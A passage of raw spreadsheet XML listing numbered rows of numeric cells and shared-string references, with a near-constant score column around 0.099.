    <row r="32038" ht="15.75" customHeight="1">
      <c r="A32038" s="1">
        <v>8908.0</v>
      </c>
      <c r="B32038" s="2">
        <v>5.480277E7</v>
      </c>
      <c r="C32038" s="2" t="s">
        <v>30822</v>
      </c>
      <c r="D32038" s="2">
        <v>1.0</v>
      </c>
      <c r="E32038" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32038" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="32039" ht="15.75" customHeight="1">
      <c r="A32039" s="1">
        <v>9183.0</v>
      </c>
      <c r="B32039" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C32039" s="2" t="s">
        <v>30823</v>
      </c>
      <c r="D32039" s="2">
        <v>1.0</v>
      </c>
      <c r="E32039" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32039" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="32040" ht="15.75" customHeight="1">
      <c r="A32040" s="1">
        <v>13613.0</v>
      </c>
      <c r="B32040" s="2">
        <v>3.5845161E7</v>
      </c>
      <c r="C32040" s="2" t="s">
        <v>30824</v>
      </c>
      <c r="D32040" s="2">
        <v>1.0</v>
      </c>
      <c r="E32040" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32040" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="32041" ht="15.75" customHeight="1">
      <c r="A32041" s="1">
        <v>15750.0</v>
      </c>
      <c r="B32041" s="2">
        <v>4.4131551E7</v>
      </c>
      <c r="C32041" s="2" t="s">
        <v>30825</v>
      </c>
      <c r="D32041" s="2">
        <v>1.0</v>
      </c>
      <c r="E32041" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32041" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="32042" ht="15.75" customHeight="1">
      <c r="A32042" s="1">
        <v>25305.0</v>
      </c>
      <c r="B32042" s="2">
        <v>1.341692E7</v>
      </c>
      <c r="C32042" s="2" t="s">
        <v>30826</v>
      </c>
      <c r="D32042" s="2">
        <v>1.0</v>
      </c>
      <c r="E32042" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32042" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="32043" ht="15.75" customHeight="1">
      <c r="A32043" s="1">
        <v>4553.0</v>
      </c>
      <c r="B32043" s="2">
        <v>4.2691344E7</v>
      </c>
      <c r="C32043" s="2" t="s">
        <v>30827</v>
      </c>
      <c r="D32043" s="2">
        <v>1.0</v>
      </c>
      <c r="E32043" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32043" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="32044" ht="15.75" customHeight="1">
      <c r="A32044" s="1">
        <v>5441.0</v>
      </c>
      <c r="B32044" s="2">
        <v>4.5608329E7</v>
      </c>
      <c r="C32044" s="2" t="s">
        <v>30828</v>
      </c>
      <c r="D32044" s="2">
        <v>1.0</v>
      </c>
      <c r="E32044" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32044" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="32045" ht="15.75" customHeight="1">
      <c r="A32045" s="1">
        <v>14235.0</v>
      </c>
      <c r="B32045" s="2">
        <v>3.8304434E7</v>
      </c>
      <c r="C32045" s="2" t="s">
        <v>30829</v>
      </c>
      <c r="D32045" s="2">
        <v>1.0</v>
      </c>
      <c r="E32045" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32045" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="32046" ht="15.75" customHeight="1">
      <c r="A32046" s="1">
        <v>22500.0</v>
      </c>
      <c r="B32046" s="2">
        <v>3.7245604E7</v>
      </c>
      <c r="C32046" s="2" t="s">
        <v>30830</v>
      </c>
      <c r="D32046" s="2">
        <v>1.0</v>
      </c>
      <c r="E32046" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32046" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="32047" ht="15.75" customHeight="1">
      <c r="A32047" s="1">
        <v>23965.0</v>
      </c>
      <c r="B32047" s="2">
        <v>9027697.0</v>
      </c>
      <c r="C32047" s="2" t="s">
        <v>30831</v>
      </c>
      <c r="D32047" s="2">
        <v>1.0</v>
      </c>
      <c r="E32047" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32047" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="32048" ht="15.75" customHeight="1">
      <c r="A32048" s="1">
        <v>28277.0</v>
      </c>
      <c r="B32048" s="2">
        <v>2.5462869E7</v>
      </c>
      <c r="C32048" s="2" t="s">
        <v>30832</v>
      </c>
      <c r="D32048" s="2">
        <v>1.0</v>
      </c>
      <c r="E32048" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32048" s="2">
        <v>0.09946236559139786</v>
      </c>
    </row>
    <row r="32049" ht="15.75" customHeight="1">
      <c r="A32049" s="1">
        <v>8819.0</v>
      </c>
      <c r="B32049" s="2">
        <v>5.4634584E7</v>
      </c>
      <c r="C32049" s="2" t="s">
        <v>30833</v>
      </c>
      <c r="D32049" s="2">
        <v>1.0</v>
      </c>
      <c r="E32049" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32049" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="32050" ht="15.75" customHeight="1">
      <c r="A32050" s="1">
        <v>28354.0</v>
      </c>
      <c r="B32050" s="2">
        <v>2.595724E7</v>
      </c>
      <c r="C32050" s="2" t="s">
        <v>30834</v>
      </c>
      <c r="D32050" s="2">
        <v>1.0</v>
      </c>
      <c r="E32050" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32050" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="32051" ht="15.75" customHeight="1">
      <c r="A32051" s="1">
        <v>28.0</v>
      </c>
      <c r="B32051" s="2">
        <v>1.0523683E7</v>
      </c>
      <c r="C32051" s="2" t="s">
        <v>30835</v>
      </c>
      <c r="D32051" s="2">
        <v>1.0</v>
      </c>
      <c r="E32051" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32051" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32052" ht="15.75" customHeight="1">
      <c r="A32052" s="1">
        <v>99.0</v>
      </c>
      <c r="B32052" s="2">
        <v>1.2547971E7</v>
      </c>
      <c r="C32052" s="2" t="s">
        <v>30836</v>
      </c>
      <c r="D32052" s="2">
        <v>1.0</v>
      </c>
      <c r="E32052" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32052" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32053" ht="15.75" customHeight="1">
      <c r="A32053" s="1">
        <v>172.0</v>
      </c>
      <c r="B32053" s="2">
        <v>1.3934075E7</v>
      </c>
      <c r="C32053" s="2" t="s">
        <v>30837</v>
      </c>
      <c r="D32053" s="2">
        <v>1.0</v>
      </c>
      <c r="E32053" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32053" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32054" ht="15.75" customHeight="1">
      <c r="A32054" s="1">
        <v>202.0</v>
      </c>
      <c r="B32054" s="2">
        <v>1.4491028E7</v>
      </c>
      <c r="C32054" s="2" t="s">
        <v>30838</v>
      </c>
      <c r="D32054" s="2">
        <v>1.0</v>
      </c>
      <c r="E32054" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32054" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32055" ht="15.75" customHeight="1">
      <c r="A32055" s="1">
        <v>262.0</v>
      </c>
      <c r="B32055" s="2">
        <v>1.514975E7</v>
      </c>
      <c r="C32055" s="2" t="s">
        <v>30839</v>
      </c>
      <c r="D32055" s="2">
        <v>1.0</v>
      </c>
      <c r="E32055" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32055" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32056" ht="15.75" customHeight="1">
      <c r="A32056" s="1">
        <v>472.0</v>
      </c>
      <c r="B32056" s="2">
        <v>1.7396781E7</v>
      </c>
      <c r="C32056" s="2" t="s">
        <v>30840</v>
      </c>
      <c r="D32056" s="2">
        <v>1.0</v>
      </c>
      <c r="E32056" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32056" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32057" ht="15.75" customHeight="1">
      <c r="A32057" s="1">
        <v>633.0</v>
      </c>
      <c r="B32057" s="2">
        <v>1.9687606E7</v>
      </c>
      <c r="C32057" s="2" t="s">
        <v>30841</v>
      </c>
      <c r="D32057" s="2">
        <v>1.0</v>
      </c>
      <c r="E32057" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32057" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32058" ht="15.75" customHeight="1">
      <c r="A32058" s="1">
        <v>749.0</v>
      </c>
      <c r="B32058" s="2">
        <v>2.0933327E7</v>
      </c>
      <c r="C32058" s="2" t="s">
        <v>30842</v>
      </c>
      <c r="D32058" s="2">
        <v>1.0</v>
      </c>
      <c r="E32058" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32058" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32059" ht="15.75" customHeight="1">
      <c r="A32059" s="1">
        <v>844.0</v>
      </c>
      <c r="B32059" s="2">
        <v>2.1677037E7</v>
      </c>
      <c r="C32059" s="2" t="s">
        <v>30843</v>
      </c>
      <c r="D32059" s="2">
        <v>1.0</v>
      </c>
      <c r="E32059" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32059" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32060" ht="15.75" customHeight="1">
      <c r="A32060" s="1">
        <v>1013.0</v>
      </c>
      <c r="B32060" s="2">
        <v>2.3097285E7</v>
      </c>
      <c r="C32060" s="2" t="s">
        <v>30844</v>
      </c>
      <c r="D32060" s="2">
        <v>1.0</v>
      </c>
      <c r="E32060" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32060" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32061" ht="15.75" customHeight="1">
      <c r="A32061" s="1">
        <v>1048.0</v>
      </c>
      <c r="B32061" s="2">
        <v>2.3381872E7</v>
      </c>
      <c r="C32061" s="2" t="s">
        <v>30845</v>
      </c>
      <c r="D32061" s="2">
        <v>1.0</v>
      </c>
      <c r="E32061" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32061" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32062" ht="15.75" customHeight="1">
      <c r="A32062" s="1">
        <v>1061.0</v>
      </c>
      <c r="B32062" s="2">
        <v>2.3454629E7</v>
      </c>
      <c r="C32062" s="2" t="s">
        <v>30846</v>
      </c>
      <c r="D32062" s="2">
        <v>1.0</v>
      </c>
      <c r="E32062" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32062" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32063" ht="15.75" customHeight="1">
      <c r="A32063" s="1">
        <v>1098.0</v>
      </c>
      <c r="B32063" s="2">
        <v>2.3858245E7</v>
      </c>
      <c r="C32063" s="2" t="s">
        <v>30847</v>
      </c>
      <c r="D32063" s="2">
        <v>1.0</v>
      </c>
      <c r="E32063" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32063" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32064" ht="15.75" customHeight="1">
      <c r="A32064" s="1">
        <v>1240.0</v>
      </c>
      <c r="B32064" s="2">
        <v>2.5096587E7</v>
      </c>
      <c r="C32064" s="2" t="s">
        <v>30848</v>
      </c>
      <c r="D32064" s="2">
        <v>1.0</v>
      </c>
      <c r="E32064" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32064" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32065" ht="15.75" customHeight="1">
      <c r="A32065" s="1">
        <v>1439.0</v>
      </c>
      <c r="B32065" s="2">
        <v>2.66974E7</v>
      </c>
      <c r="C32065" s="2" t="s">
        <v>30849</v>
      </c>
      <c r="D32065" s="2">
        <v>1.0</v>
      </c>
      <c r="E32065" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32065" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32066" ht="15.75" customHeight="1">
      <c r="A32066" s="1">
        <v>1769.0</v>
      </c>
      <c r="B32066" s="2">
        <v>2.9006325E7</v>
      </c>
      <c r="C32066" s="2" t="s">
        <v>30850</v>
      </c>
      <c r="D32066" s="2">
        <v>1.0</v>
      </c>
      <c r="E32066" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32066" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32067" ht="15.75" customHeight="1">
      <c r="A32067" s="1">
        <v>1824.0</v>
      </c>
      <c r="B32067" s="2">
        <v>2.9289276E7</v>
      </c>
      <c r="C32067" s="2" t="s">
        <v>30851</v>
      </c>
      <c r="D32067" s="2">
        <v>1.0</v>
      </c>
      <c r="E32067" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32067" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32068" ht="15.75" customHeight="1">
      <c r="A32068" s="1">
        <v>1885.0</v>
      </c>
      <c r="B32068" s="2">
        <v>2.9789211E7</v>
      </c>
      <c r="C32068" s="2" t="s">
        <v>30852</v>
      </c>
      <c r="D32068" s="2">
        <v>1.0</v>
      </c>
      <c r="E32068" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32068" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32069" ht="15.75" customHeight="1">
      <c r="A32069" s="1">
        <v>1893.0</v>
      </c>
      <c r="B32069" s="2">
        <v>2.9839621E7</v>
      </c>
      <c r="C32069" s="2" t="s">
        <v>30853</v>
      </c>
      <c r="D32069" s="2">
        <v>1.0</v>
      </c>
      <c r="E32069" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32069" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32070" ht="15.75" customHeight="1">
      <c r="A32070" s="1">
        <v>1896.0</v>
      </c>
      <c r="B32070" s="2">
        <v>2.9871968E7</v>
      </c>
      <c r="C32070" s="2" t="s">
        <v>30854</v>
      </c>
      <c r="D32070" s="2">
        <v>1.0</v>
      </c>
      <c r="E32070" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32070" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32071" ht="15.75" customHeight="1">
      <c r="A32071" s="1">
        <v>1914.0</v>
      </c>
      <c r="B32071" s="2">
        <v>3.0035885E7</v>
      </c>
      <c r="C32071" s="2" t="s">
        <v>30855</v>
      </c>
      <c r="D32071" s="2">
        <v>1.0</v>
      </c>
      <c r="E32071" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32071" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32072" ht="15.75" customHeight="1">
      <c r="A32072" s="1">
        <v>1922.0</v>
      </c>
      <c r="B32072" s="2">
        <v>3.0082094E7</v>
      </c>
      <c r="C32072" s="2" t="s">
        <v>30856</v>
      </c>
      <c r="D32072" s="2">
        <v>1.0</v>
      </c>
      <c r="E32072" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32072" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32073" ht="15.75" customHeight="1">
      <c r="A32073" s="1">
        <v>1956.0</v>
      </c>
      <c r="B32073" s="2">
        <v>3.0292301E7</v>
      </c>
      <c r="C32073" s="2" t="s">
        <v>30857</v>
      </c>
      <c r="D32073" s="2">
        <v>1.0</v>
      </c>
      <c r="E32073" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32073" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32074" ht="15.75" customHeight="1">
      <c r="A32074" s="1">
        <v>2002.0</v>
      </c>
      <c r="B32074" s="2">
        <v>3.0625399E7</v>
      </c>
      <c r="C32074" s="2" t="s">
        <v>30858</v>
      </c>
      <c r="D32074" s="2">
        <v>1.0</v>
      </c>
      <c r="E32074" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32074" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32075" ht="15.75" customHeight="1">
      <c r="A32075" s="1">
        <v>2169.0</v>
      </c>
      <c r="B32075" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C32075" s="2" t="s">
        <v>30859</v>
      </c>
      <c r="D32075" s="2">
        <v>1.0</v>
      </c>
      <c r="E32075" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32075" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32076" ht="15.75" customHeight="1">
      <c r="A32076" s="1">
        <v>2218.0</v>
      </c>
      <c r="B32076" s="2">
        <v>3.2142714E7</v>
      </c>
      <c r="C32076" s="2" t="s">
        <v>30860</v>
      </c>
      <c r="D32076" s="2">
        <v>1.0</v>
      </c>
      <c r="E32076" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32076" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32077" ht="15.75" customHeight="1">
      <c r="A32077" s="1">
        <v>2260.0</v>
      </c>
      <c r="B32077" s="2">
        <v>3.2370737E7</v>
      </c>
      <c r="C32077" s="2" t="s">
        <v>30861</v>
      </c>
      <c r="D32077" s="2">
        <v>1.0</v>
      </c>
      <c r="E32077" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32077" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32078" ht="15.75" customHeight="1">
      <c r="A32078" s="1">
        <v>2534.0</v>
      </c>
      <c r="B32078" s="2">
        <v>3.4098873E7</v>
      </c>
      <c r="C32078" s="2" t="s">
        <v>30862</v>
      </c>
      <c r="D32078" s="2">
        <v>1.0</v>
      </c>
      <c r="E32078" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32078" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32079" ht="15.75" customHeight="1">
      <c r="A32079" s="1">
        <v>2553.0</v>
      </c>
      <c r="B32079" s="2">
        <v>3.4154428E7</v>
      </c>
      <c r="C32079" s="2" t="s">
        <v>30863</v>
      </c>
      <c r="D32079" s="2">
        <v>1.0</v>
      </c>
      <c r="E32079" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32079" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32080" ht="15.75" customHeight="1">
      <c r="A32080" s="1">
        <v>2790.0</v>
      </c>
      <c r="B32080" s="2">
        <v>3.524357E7</v>
      </c>
      <c r="C32080" s="2" t="s">
        <v>30864</v>
      </c>
      <c r="D32080" s="2">
        <v>1.0</v>
      </c>
      <c r="E32080" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32080" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32081" ht="15.75" customHeight="1">
      <c r="A32081" s="1">
        <v>2914.0</v>
      </c>
      <c r="B32081" s="2">
        <v>3.5830644E7</v>
      </c>
      <c r="C32081" s="2" t="s">
        <v>30865</v>
      </c>
      <c r="D32081" s="2">
        <v>1.0</v>
      </c>
      <c r="E32081" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32081" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32082" ht="15.75" customHeight="1">
      <c r="A32082" s="1">
        <v>2933.0</v>
      </c>
      <c r="B32082" s="2">
        <v>3.5933669E7</v>
      </c>
      <c r="C32082" s="2" t="s">
        <v>30866</v>
      </c>
      <c r="D32082" s="2">
        <v>1.0</v>
      </c>
      <c r="E32082" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32082" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32083" ht="15.75" customHeight="1">
      <c r="A32083" s="1">
        <v>3047.0</v>
      </c>
      <c r="B32083" s="2">
        <v>3.650317E7</v>
      </c>
      <c r="C32083" s="2" t="s">
        <v>24193</v>
      </c>
      <c r="D32083" s="2">
        <v>1.0</v>
      </c>
      <c r="E32083" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32083" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32084" ht="15.75" customHeight="1">
      <c r="A32084" s="1">
        <v>3641.0</v>
      </c>
      <c r="B32084" s="2">
        <v>3.9283139E7</v>
      </c>
      <c r="C32084" s="2" t="s">
        <v>30867</v>
      </c>
      <c r="D32084" s="2">
        <v>1.0</v>
      </c>
      <c r="E32084" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32084" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32085" ht="15.75" customHeight="1">
      <c r="A32085" s="1">
        <v>3783.0</v>
      </c>
      <c r="B32085" s="2">
        <v>3.9919894E7</v>
      </c>
      <c r="C32085" s="2" t="s">
        <v>30868</v>
      </c>
      <c r="D32085" s="2">
        <v>1.0</v>
      </c>
      <c r="E32085" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32085" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32086" ht="15.75" customHeight="1">
      <c r="A32086" s="1">
        <v>3822.0</v>
      </c>
      <c r="B32086" s="2">
        <v>4.0131771E7</v>
      </c>
      <c r="C32086" s="2" t="s">
        <v>30869</v>
      </c>
      <c r="D32086" s="2">
        <v>1.0</v>
      </c>
      <c r="E32086" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32086" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32087" ht="15.75" customHeight="1">
      <c r="A32087" s="1">
        <v>4168.0</v>
      </c>
      <c r="B32087" s="2">
        <v>4.1535605E7</v>
      </c>
      <c r="C32087" s="2" t="s">
        <v>30870</v>
      </c>
      <c r="D32087" s="2">
        <v>1.0</v>
      </c>
      <c r="E32087" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32087" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32088" ht="15.75" customHeight="1">
      <c r="A32088" s="1">
        <v>4173.0</v>
      </c>
      <c r="B32088" s="2">
        <v>4.1552502E7</v>
      </c>
      <c r="C32088" s="2" t="s">
        <v>30871</v>
      </c>
      <c r="D32088" s="2">
        <v>1.0</v>
      </c>
      <c r="E32088" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32088" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32089" ht="15.75" customHeight="1">
      <c r="A32089" s="1">
        <v>4319.0</v>
      </c>
      <c r="B32089" s="2">
        <v>4.2009016E7</v>
      </c>
      <c r="C32089" s="2" t="s">
        <v>30872</v>
      </c>
      <c r="D32089" s="2">
        <v>1.0</v>
      </c>
      <c r="E32089" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32089" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32090" ht="15.75" customHeight="1">
      <c r="A32090" s="1">
        <v>4494.0</v>
      </c>
      <c r="B32090" s="2">
        <v>4.2534694E7</v>
      </c>
      <c r="C32090" s="2" t="s">
        <v>30873</v>
      </c>
      <c r="D32090" s="2">
        <v>1.0</v>
      </c>
      <c r="E32090" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32090" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32091" ht="15.75" customHeight="1">
      <c r="A32091" s="1">
        <v>4724.0</v>
      </c>
      <c r="B32091" s="2">
        <v>4.3320068E7</v>
      </c>
      <c r="C32091" s="2" t="s">
        <v>30874</v>
      </c>
      <c r="D32091" s="2">
        <v>1.0</v>
      </c>
      <c r="E32091" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32091" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32092" ht="15.75" customHeight="1">
      <c r="A32092" s="1">
        <v>5074.0</v>
      </c>
      <c r="B32092" s="2">
        <v>4.4423325E7</v>
      </c>
      <c r="C32092" s="2" t="s">
        <v>30875</v>
      </c>
      <c r="D32092" s="2">
        <v>1.0</v>
      </c>
      <c r="E32092" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32092" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32093" ht="15.75" customHeight="1">
      <c r="A32093" s="1">
        <v>5100.0</v>
      </c>
      <c r="B32093" s="2">
        <v>4.4517029E7</v>
      </c>
      <c r="C32093" s="2" t="s">
        <v>30876</v>
      </c>
      <c r="D32093" s="2">
        <v>1.0</v>
      </c>
      <c r="E32093" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32093" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32094" ht="15.75" customHeight="1">
      <c r="A32094" s="1">
        <v>5158.0</v>
      </c>
      <c r="B32094" s="2">
        <v>4.4740589E7</v>
      </c>
      <c r="C32094" s="2" t="s">
        <v>30877</v>
      </c>
      <c r="D32094" s="2">
        <v>1.0</v>
      </c>
      <c r="E32094" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32094" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32095" ht="15.75" customHeight="1">
      <c r="A32095" s="1">
        <v>5361.0</v>
      </c>
      <c r="B32095" s="2">
        <v>4.5374293E7</v>
      </c>
      <c r="C32095" s="2" t="s">
        <v>30878</v>
      </c>
      <c r="D32095" s="2">
        <v>1.0</v>
      </c>
      <c r="E32095" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32095" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32096" ht="15.75" customHeight="1">
      <c r="A32096" s="1">
        <v>5651.0</v>
      </c>
      <c r="B32096" s="2">
        <v>4.6286945E7</v>
      </c>
      <c r="C32096" s="2" t="s">
        <v>30879</v>
      </c>
      <c r="D32096" s="2">
        <v>1.0</v>
      </c>
      <c r="E32096" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32096" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32097" ht="15.75" customHeight="1">
      <c r="A32097" s="1">
        <v>5664.0</v>
      </c>
      <c r="B32097" s="2">
        <v>4.6320455E7</v>
      </c>
      <c r="C32097" s="2" t="s">
        <v>30880</v>
      </c>
      <c r="D32097" s="2">
        <v>1.0</v>
      </c>
      <c r="E32097" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32097" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32098" ht="15.75" customHeight="1">
      <c r="A32098" s="1">
        <v>5733.0</v>
      </c>
      <c r="B32098" s="2">
        <v>4.6611509E7</v>
      </c>
      <c r="C32098" s="2" t="s">
        <v>30881</v>
      </c>
      <c r="D32098" s="2">
        <v>1.0</v>
      </c>
      <c r="E32098" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32098" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32099" ht="15.75" customHeight="1">
      <c r="A32099" s="1">
        <v>5780.0</v>
      </c>
      <c r="B32099" s="2">
        <v>4.6736158E7</v>
      </c>
      <c r="C32099" s="2" t="s">
        <v>30882</v>
      </c>
      <c r="D32099" s="2">
        <v>1.0</v>
      </c>
      <c r="E32099" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32099" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32100" ht="15.75" customHeight="1">
      <c r="A32100" s="1">
        <v>5806.0</v>
      </c>
      <c r="B32100" s="2">
        <v>4.6791727E7</v>
      </c>
      <c r="C32100" s="2" t="s">
        <v>30883</v>
      </c>
      <c r="D32100" s="2">
        <v>1.0</v>
      </c>
      <c r="E32100" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32100" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32101" ht="15.75" customHeight="1">
      <c r="A32101" s="1">
        <v>6035.0</v>
      </c>
      <c r="B32101" s="2">
        <v>4.7582424E7</v>
      </c>
      <c r="C32101" s="2" t="s">
        <v>30884</v>
      </c>
      <c r="D32101" s="2">
        <v>1.0</v>
      </c>
      <c r="E32101" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32101" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32102" ht="15.75" customHeight="1">
      <c r="A32102" s="1">
        <v>6062.0</v>
      </c>
      <c r="B32102" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C32102" s="2" t="s">
        <v>30885</v>
      </c>
      <c r="D32102" s="2">
        <v>1.0</v>
      </c>
      <c r="E32102" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32102" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32103" ht="15.75" customHeight="1">
      <c r="A32103" s="1">
        <v>6255.0</v>
      </c>
      <c r="B32103" s="2">
        <v>4.8111026E7</v>
      </c>
      <c r="C32103" s="2" t="s">
        <v>30886</v>
      </c>
      <c r="D32103" s="2">
        <v>1.0</v>
      </c>
      <c r="E32103" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32103" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32104" ht="15.75" customHeight="1">
      <c r="A32104" s="1">
        <v>6418.0</v>
      </c>
      <c r="B32104" s="2">
        <v>4.8541108E7</v>
      </c>
      <c r="C32104" s="2" t="s">
        <v>30887</v>
      </c>
      <c r="D32104" s="2">
        <v>1.0</v>
      </c>
      <c r="E32104" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32104" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
